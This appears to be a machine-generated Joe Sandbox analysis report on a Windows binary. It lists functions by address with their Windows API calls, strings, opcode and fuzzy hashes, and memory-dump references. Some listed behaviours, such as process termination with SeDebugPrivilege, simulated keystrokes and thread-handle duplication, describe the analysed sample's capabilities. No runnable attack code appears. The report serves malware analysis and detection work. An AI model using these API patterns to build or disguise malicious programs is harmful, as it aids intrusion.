Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: ee534f772997db8813efceda7a08ecbfb9743aff0f71cad984ed083cdf364cc0
Instruction ID: fdedab727f09226f48b9655d032712ab0614117a75aa493effb3b01095c71421
Opcode Fuzzy Hash: ee534f772997db8813efceda7a08ecbfb9743aff0f71cad984ed083cdf364cc0
Instruction Fuzzy Hash: A5F15971A00109AFCF04DFA4C888EEEB7B9FF49354F108059F909AB251DB71AE46EB51

Function 00F7F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F7F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00F7F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00F7FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00F7FA7C
CloseHandle.KERNEL32(?), ref: 00F7FAAB
CloseHandle.KERNEL32(?), ref: 00F7FB22

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: 2f066a812b24188c5ea76b6a9937d49d3b62f393ab02f0cbeb521f52071877f5
Instruction ID: 2b0396e967fd27f51d847f0181753fb0c94a36d1bc43c5b5ca1b5455d50c37ff
Opcode Fuzzy Hash: 2f066a812b24188c5ea76b6a9937d49d3b62f393ab02f0cbeb521f52071877f5
Instruction Fuzzy Hash: 57E1B0716043019FC714EF24C881B6ABBE1EF85364F14C56EF8999B2A2DB34DC49EB52

Function 00F64CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00F63697,?), ref: 00F6468B

Part of subcall function 00F6466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00F63697,?), ref: 00F646A4

Part of subcall function 00F64A31: GetFileAttributesW.KERNEL32(?,00F6370B), ref: 00F64A32

lstrcmpiW.KERNEL32(?,?), ref: 00F64D40
_wcscmp.LIBCMT ref: 00F64D5A
MoveFileW.KERNEL32(?,?), ref: 00F64D75

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: 989484e1356c1215fefbdc081fba1a08693ad171876d0785d73a024106278947
Instruction ID: 52633cc68de1527a0a40702b1c4c764680abfe9d8865314bff4f1e9e796eb8b6
Opcode Fuzzy Hash: 989484e1356c1215fefbdc081fba1a08693ad171876d0785d73a024106278947
Instruction Fuzzy Hash: E15164B24083459BC764EBA0DC819DFB3ECAF84750F40092EB289D3151EF75B688DB66

Function 00F88645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00F886FF

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: a5f79e3d52e4e9b201115e74b9cbd8b4ccfdb9ed6c3f11a4e000298c12408acf
Instruction ID: 5f105815270a96a4d5640a6f607b50e01d0c0de13434bf80a3ef68c5ab764de0
Opcode Fuzzy Hash: a5f79e3d52e4e9b201115e74b9cbd8b4ccfdb9ed6c3f11a4e000298c12408acf
Instruction Fuzzy Hash: 85518271900244BEEF20AB24CC89FED7BA5EB057A0FA04215F951E61E1DF75AD81FB50

Function 00F02B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00F3C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F3C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F3C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00F3C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F3C370
DestroyIcon.USER32(00000000), ref: 00F3C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F3C39C
DestroyIcon.USER32(?), ref: 00F3C3AB

Part of subcall function 00F8A4AF: DeleteObject.GDI32(00000000), ref: 00F8A4E8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: fec967f80bd198887d9dbf702cbd35360b9185dfcb0fbebca69d24d9c69c5303
Instruction ID: a9f9d661cf5247678361f37b8288558b4e73a9d29cfd56978c7bdfcc0e945dc4
Opcode Fuzzy Hash: fec967f80bd198887d9dbf702cbd35360b9185dfcb0fbebca69d24d9c69c5303
Instruction Fuzzy Hash: BA513C71A00209AFDB24DF64CC45FAA7BB5EB54720F104529F942A72D0D770ED90FBA0

Function 00F5966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F5A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F5A84C
Part of subcall function 00F5A82C: GetCurrentThreadId.KERNEL32 ref: 00F5A853
Part of subcall function 00F5A82C: AttachThreadInput.USER32(00000000,?,00F59683,?,00000001), ref: 00F5A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00F5968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F596AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00F596AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F596B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F596D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F596D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00F596E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F596F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00F596FB

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: cd392976d44509d30bcb25eb00a2d78880f57726ef3bec403820c75818c5b6f4
Instruction ID: bc52ecb90ea4f14f8c1a321e30e900b6cf1f04a7af71e71503ea313113481b9a
Opcode Fuzzy Hash: cd392976d44509d30bcb25eb00a2d78880f57726ef3bec403820c75818c5b6f4
Instruction Fuzzy Hash: C511E1B1A10618BEF6106F60DC8DFBA3B2DEB4C752F100525F744AB0A1C9F25C14EBA4

Function 00F58921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00F5853C,00000B00,?,?), ref: 00F5892A
HeapAlloc.KERNEL32(00000000,?,00F5853C,00000B00,?,?), ref: 00F58931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F5853C,00000B00,?,?), ref: 00F58946
GetCurrentProcess.KERNEL32(?,00000000,?,00F5853C,00000B00,?,?), ref: 00F5894E
DuplicateHandle.KERNEL32(00000000,?,00F5853C,00000B00,?,?), ref: 00F58951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00F5853C,00000B00,?,?), ref: 00F58961
GetCurrentProcess.KERNEL32(00F5853C,00000000,?,00F5853C,00000B00,?,?), ref: 00F58969
DuplicateHandle.KERNEL32(00000000,?,00F5853C,00000B00,?,?), ref: 00F5896C
CreateThread.KERNEL32(00000000,00000000,00F58992,00000000,00000000,00000000), ref: 00F58986

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 0059de9bd7eb2f24994e3caec5707429845ab5f8405122afff8c58f2e26b1171
Instruction ID: b8c69d6f7454b7e478a9350cfb5b2985c6aa445c01dfab7a9566ea6b997a9340
Opcode Fuzzy Hash: 0059de9bd7eb2f24994e3caec5707429845ab5f8405122afff8c58f2e26b1171
Instruction Fuzzy Hash: 5C01BBB5240748FFE710ABA5DC8DFAB7BACEB89711F408421FA05DB1A1CA749814DB21

Function 00F79B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

Not an Object type, xrefs: 00F79B7B
NULL Pointer assignment, xrefs: 00F79BA4, 00F79EC8

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 35eff034d9ed15861c90f82f3e96b994cea386b1199b47cd9fa54022d598f7c5
Instruction ID: 291039c7e839e43d1f97ea1bc0eef16120f928fae1251f24af1d89da8ba864f6
Opcode Fuzzy Hash: 35eff034d9ed15861c90f82f3e96b994cea386b1199b47cd9fa54022d598f7c5
Instruction Fuzzy Hash: A3C19371E0421A9FDF10DF98D884BAEB7F5FB48314F14846AE909A7280E7B0DD45DBA1

Function 00F79113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F79167
VariantInit.OLEAUT32(?), ref: 00F79238
VariantInit.OLEAUT32(?), ref: 00F79339
VariantClear.OLEAUT32(?), ref: 00F79343
VariantClear.OLEAUT32(?), ref: 00F793A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00F791C8, 00F792F6, 00F793AE
Incorrect Object type in FOR..IN loop, xrefs: 00F7931C

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: efbaf52940ab7ca9e4b6bdb28157153a05cc459609e4ab130f4086c9f84388d1
Instruction ID: ff7eeb1598ce2cd6685efd918fef7dfc4e03cca4b72b81b47303349a5ecf6068
Opcode Fuzzy Hash: efbaf52940ab7ca9e4b6bdb28157153a05cc459609e4ab130f4086c9f84388d1
Instruction Fuzzy Hash: 6C919E71E04219ABDF20DFA5CC48FAEB7B8EF45720F10815AF519AB281D7B09905DFA1

Function 00F7975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00F5710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?,?,00F57455), ref: 00F57127
Part of subcall function 00F5710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57142
Part of subcall function 00F5710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?,?), ref: 00F57150
Part of subcall function 00F5710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00F57044,80070057,?), ref: 00F57160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00F79806
_memset.LIBCMT ref: 00F79813
_memset.LIBCMT ref: 00F79956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00F79982
CoTaskMemFree.OLE32(?), ref: 00F7998D

Strings

NULL Pointer assignment, xrefs: 00F799DB

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: 46d2df5b8aac5a535236545f9faf5ec4ec4d2948b9903540e5e0161b6ba44b42
Instruction ID: 22ed54ce9d47accb8f7bfdcf17a511a51673865b5e5699e6dcbd3388d9fedbef
Opcode Fuzzy Hash: 46d2df5b8aac5a535236545f9faf5ec4ec4d2948b9903540e5e0161b6ba44b42
Instruction Fuzzy Hash: 32915A71D00229EBDB10DFA4DC40EDEBBB9AF08310F10805AF519A7281EB759A04EFA1

Function 00F86D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00F86E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00F86E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00F86E52
_wcscat.LIBCMT ref: 00F86EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00F86EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00F86EF2

Strings

SysListView32, xrefs: 00F86DF6

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 9fe9f0e2477f99d93d222ede1c8e51051f986d6a64e6ba88f9e98d148925c013
Instruction ID: 8c1805540f776985085faa2a67438f826266d76bdca32fbfcc42839eee4ae093
Opcode Fuzzy Hash: 9fe9f0e2477f99d93d222ede1c8e51051f986d6a64e6ba88f9e98d148925c013
Instruction Fuzzy Hash: 0341A171A00349AFEB21EF64CC85BEE77A8EF08760F10052AF584E7291D6759D84AB64

Function 00F7E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00F63C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00F63C7A
Part of subcall function 00F63C55: Process32FirstW.KERNEL32(00000000,?), ref: 00F63C88
Part of subcall function 00F63C55: CloseHandle.KERNEL32(00000000), ref: 00F63D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7E9A4
GetLastError.KERNEL32 ref: 00F7E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F7E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00F7EA63
GetLastError.KERNEL32(00000000), ref: 00F7EA6E
CloseHandle.KERNEL32(00000000), ref: 00F7EAA3

Strings

SeDebugPrivilege, xrefs: 00F7E9C2

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: b2127bf8ec0b50403ad7cbd74777cc92340e571fa07fb605da5c5c6d19718783
Instruction ID: 569b79a9d01bde4d2109304815c5bde0586eadfa971169484b312bca8b5dd3d1
Opcode Fuzzy Hash: b2127bf8ec0b50403ad7cbd74777cc92340e571fa07fb605da5c5c6d19718783
Instruction Fuzzy Hash: 8341AD716042019FDB10EF24CC95FADB7E5AF44314F58C45AF9069B3D2DBB8A808EB92

Function 00F62F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00F63033

Strings

blank, xrefs: 00F62FB5
info, xrefs: 00F62FD4
question, xrefs: 00F62FEC
warning, xrefs: 00F6301C
stop, xrefs: 00F63004

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 6d99961ea4fe6448a84fc17267c53911c429e06a58ee252f77abaeaa76faba9c
Instruction ID: 60023fd4be853ba9c03a920110de96f1f0064995313089b2633c4d68cf986b87
Opcode Fuzzy Hash: 6d99961ea4fe6448a84fc17267c53911c429e06a58ee252f77abaeaa76faba9c
Instruction Fuzzy Hash: CB113A32748786BEE7249B55EC42DEF7B9CDF15374B20002AF900A61C1DB74AF487AA1

Function 00F642F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00F64312
LoadStringW.USER32(00000000), ref: 00F64319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00F6432F
LoadStringW.USER32(00000000), ref: 00F64336
_wprintf.LIBCMT ref: 00F6435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F6437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00F64357

Memory Dump Source

Source File: 00000000.00000002.1349914160.0000000000F01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F00000, based on PE: true

Associated: 00000000.00000002.1349876743.0000000000F00000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000F8F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350009460.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350080867.0000000000FBE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC7000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FC9000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1350113285.0000000000FDD000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f00000_k9OEsV37GE.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wprintf
String ID: %s (%d) : ==> %s: %s %s
API String ID: 3648134473-3128320259
Opcode ID: fb64a18e5a9747df23477392288f1510be9191073f62b1320f2c9bb1bc334cf3
Instruction ID: 34c49439ee83a7aab051cb4b54a6f05ec857a291c10e559101468d773aa1188e
Opcode Fuzzy Hash: fb64a18e5a9747df23477392288f1510be9191073f62b1320f2c9bb1bc334cf3
Instruction Fuzzy Hash: 250162F290020CBFE711A7A0DD89EF6776CEB08300F4005A1B745E2051EA759E896B71

Function 00F8D43E Relevance: 12.3, APIs: 8, Instructions: 257windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F02612: GetWindowLongW.USER32(?,000000EB), ref: 00F02623

GetSystemMetrics.USER32(0000000F), ref: 00F8D47C
GetSystemMetrics.USER32(0000000F), ref: 00F8D49C
